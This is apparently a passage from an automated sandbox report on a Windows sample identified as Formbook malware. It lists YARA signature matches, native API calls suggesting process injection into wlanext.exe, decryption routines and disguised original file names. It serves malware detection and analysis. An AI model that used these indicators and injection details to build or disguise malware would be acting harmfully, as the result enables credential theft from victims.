Source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004181C0 NtCreateFile, 9_2_004181C0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_00418270 NtReadFile, 9_2_00418270
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004182F0 NtClose, 9_2_004182F0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004183A0 NtAllocateVirtualMemory, 9_2_004183A0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004181BC NtCreateFile, 9_2_004181BC
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0041826B NtReadFile, 9_2_0041826B
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004182EA NtClose, 9_2_004182EA
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369910 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_01369910
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013699A0 NtCreateSection,LdrInitializeThunk, 9_2_013699A0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369860 NtQuerySystemInformation,LdrInitializeThunk, 9_2_01369860
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369840 NtDelayExecution,LdrInitializeThunk, 9_2_01369840
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013698F0 NtReadVirtualMemory,LdrInitializeThunk, 9_2_013698F0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369A20 NtResumeThread,LdrInitializeThunk, 9_2_01369A20
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369A00 NtProtectVirtualMemory,LdrInitializeThunk, 9_2_01369A00
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369A50 NtCreateFile,LdrInitializeThunk, 9_2_01369A50
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369540 NtReadFile,LdrInitializeThunk, 9_2_01369540
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013695D0 NtClose,LdrInitializeThunk, 9_2_013695D0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369710 NtQueryInformationToken,LdrInitializeThunk, 9_2_01369710
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013697A0 NtUnmapViewOfSection,LdrInitializeThunk, 9_2_013697A0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369780 NtMapViewOfSection,LdrInitializeThunk, 9_2_01369780
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369FE0 NtCreateMutant,LdrInitializeThunk, 9_2_01369FE0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369660 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_01369660
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013696E0 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_013696E0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369950 NtQueueApcThread, 9_2_01369950
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013699D0 NtCreateProcessEx, 9_2_013699D0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369820 NtEnumerateKey, 9_2_01369820
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0136B040 NtSuspendThread, 9_2_0136B040
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013698A0 NtWriteVirtualMemory, 9_2_013698A0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369B00 NtSetValueKey, 9_2_01369B00
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0136A3B0 NtGetContextThread, 9_2_0136A3B0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369A10 NtQuerySection, 9_2_01369A10
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369A80 NtOpenDirectoryObject, 9_2_01369A80
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0136AD30 NtSetContextThread, 9_2_0136AD30
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369520 NtWaitForSingleObject, 9_2_01369520
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369560 NtWriteFile, 9_2_01369560
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013695F0 NtQueryInformationFile, 9_2_013695F0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369730 NtQueryVirtualMemory, 9_2_01369730
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0136A710 NtOpenProcessToken, 9_2_0136A710
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0136A770 NtOpenThread, 9_2_0136A770
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369770 NtSetInformationFile, 9_2_01369770
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369760 NtOpenProcess, 9_2_01369760
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369610 NtEnumerateValueKey, 9_2_01369610
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369670 NtQueryInformationProcess, 9_2_01369670
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369650 NtQueryValueKey, 9_2_01369650
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013696D0 NtCreateKey, 9_2_013696D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969A50 NtCreateFile,LdrInitializeThunk, 17_2_03969A50
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039699A0 NtCreateSection,LdrInitializeThunk, 17_2_039699A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969910 NtAdjustPrivilegesToken,LdrInitializeThunk, 17_2_03969910
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969840 NtDelayExecution,LdrInitializeThunk, 17_2_03969840
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969860 NtQuerySystemInformation,LdrInitializeThunk, 17_2_03969860
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969780 NtMapViewOfSection,LdrInitializeThunk, 17_2_03969780
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969FE0 NtCreateMutant,LdrInitializeThunk, 17_2_03969FE0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969710 NtQueryInformationToken,LdrInitializeThunk, 17_2_03969710
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039696D0 NtCreateKey,LdrInitializeThunk, 17_2_039696D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039696E0 NtFreeVirtualMemory,LdrInitializeThunk, 17_2_039696E0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969650 NtQueryValueKey,LdrInitializeThunk, 17_2_03969650
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969660 NtAllocateVirtualMemory,LdrInitializeThunk, 17_2_03969660
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039695D0 NtClose,LdrInitializeThunk, 17_2_039695D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969540 NtReadFile,LdrInitializeThunk, 17_2_03969540
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0396A3B0 NtGetContextThread, 17_2_0396A3B0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969B00 NtSetValueKey, 17_2_03969B00
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969A80 NtOpenDirectoryObject, 17_2_03969A80
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969A10 NtQuerySection, 17_2_03969A10
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969A00 NtProtectVirtualMemory, 17_2_03969A00
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969A20 NtResumeThread, 17_2_03969A20
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039699D0 NtCreateProcessEx, 17_2_039699D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969950 NtQueueApcThread, 17_2_03969950
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039698A0 NtWriteVirtualMemory, 17_2_039698A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039698F0 NtReadVirtualMemory, 17_2_039698F0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969820 NtEnumerateKey, 17_2_03969820
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0396B040 NtSuspendThread, 17_2_0396B040
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039697A0 NtUnmapViewOfSection, 17_2_039697A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0396A710 NtOpenProcessToken, 17_2_0396A710
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969730 NtQueryVirtualMemory, 17_2_03969730
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0396A770 NtOpenThread, 17_2_0396A770
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969770 NtSetInformationFile, 17_2_03969770
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969760 NtOpenProcess, 17_2_03969760
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969610 NtEnumerateValueKey, 17_2_03969610
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969670 NtQueryInformationProcess, 17_2_03969670
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039695F0 NtQueryInformationFile, 17_2_039695F0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0396AD30 NtSetContextThread, 17_2_0396AD30
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969520 NtWaitForSingleObject, 17_2_03969520
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969560 NtWriteFile, 17_2_03969560
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE82F0 NtClose, 17_2_02EE82F0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE8270 NtReadFile, 17_2_02EE8270
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE83A0 NtAllocateVirtualMemory, 17_2_02EE83A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE81C0 NtCreateFile, 17_2_02EE81C0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE82EA NtClose, 17_2_02EE82EA
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE826B NtReadFile, 17_2_02EE826B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE81BC NtCreateFile, 17_2_02EE81BC
Detected potential crypto function
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 0_2_015B8E10 0_2_015B8E10
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_00401030 9_2_00401030
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0041CAB3 9_2_0041CAB3
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_00408C60 9_2_00408C60
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0041BC8F 9_2_0041BC8F
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_00402D90 9_2_00402D90
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0041B758 9_2_0041B758
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_00402FB0 9_2_00402FB0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01344120 9_2_01344120
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132F900 9_2_0132F900
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013FE824 9_2_013FE824
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1002 9_2_013E1002
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013520A0 9_2_013520A0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F20A8 9_2_013F20A8
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133B090 9_2_0133B090
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F28EC 9_2_013F28EC
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F2B28 9_2_013F2B28
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135EBB0 9_2_0135EBB0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013EDBD2 9_2_013EDBD2
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F22AE 9_2_013F22AE
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01320D20 9_2_01320D20
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F2D07 9_2_013F2D07
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F1D55 9_2_013F1D55
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01352581 9_2_01352581
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133D5E0 9_2_0133D5E0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F25DD 9_2_013F25DD
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133841F 9_2_0133841F
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013ED466 9_2_013ED466
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F1FF1 9_2_013F1FF1
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013FDFCE 9_2_013FDFCE
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01346E30 9_2_01346E30
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013ED616 9_2_013ED616
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F2EF7 9_2_013F2EF7
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395EBB0 17_2_0395EBB0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039EDBD2 17_2_039EDBD2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F2B28 17_2_039F2B28
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F22AE 17_2_039F22AE
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392F900 17_2_0392F900
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03944120 17_2_03944120
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0393B090 17_2_0393B090
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039520A0 17_2_039520A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F20A8 17_2_039F20A8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F28EC 17_2_039F28EC
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039E1002 17_2_039E1002
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F1FF1 17_2_039F1FF1
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F2EF7 17_2_039F2EF7
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03946E30 17_2_03946E30
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03952581 17_2_03952581
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F25DD 17_2_039F25DD
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0393D5E0 17_2_0393D5E0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F2D07 17_2_039F2D07
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03920D20 17_2_03920D20
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F1D55 17_2_039F1D55
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0393841F 17_2_0393841F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039ED466 17_2_039ED466
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EECAB3 17_2_02EECAB3
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02ED2FB0 17_2_02ED2FB0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EEB758 17_2_02EEB758
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EEBC8F 17_2_02EEBC8F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02ED8C60 17_2_02ED8C60
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02ED2D90 17_2_02ED2D90
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\wlanext.exe Code function: String function: 0392B150 appears 35 times
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: String function: 0132B150 appears 35 times
One or more processes crash
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 2152
Sample file is different than original file name gathered from version info
Source: PO45937008ADENGY.exe, 00000000.00000002.723466381.00000000052D0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.719959307.00000000052A0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamenlsbres.dllj% vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.725224710.0000000006550000.00000002.00000001.sdmp Binary or memory string: originalfilename vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.725224710.0000000006550000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.725096915.0000000006460000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.708791475.0000000000ACE000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDimbono.exe0 vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.710098516.0000000002DF1000.00000004.00000001.sdmp Binary or memory string: OriginalFilename vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.724929316.0000000006210000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameMFRo XBk.exe2 vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.712443613.0000000003DF9000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameRunPeBraba.dll6 vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.720152538.00000000052B0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000007.00000002.660956521.00000000001FE000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDimbono.exe0 vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000008.00000000.661485381.000000000004E000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDimbono.exe0 vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe Binary or memory string: OriginalFilename vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000009.00000000.662706033.00000000008DE000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDimbono.exe0 vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000009.00000002.716188410.00000000015AF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameMFRo XBk.exe2 vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000009.00000002.716529184.0000000002F92000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamewlanext.exej% vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe Binary or memory string: OriginalFilenameDimbono.exe0 vs PO45937008ADENGY.exe
Yara signature match
Source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbJ
Source: classification engine Classification label: mal100.troj.evad.winEXE@17/5@16/13
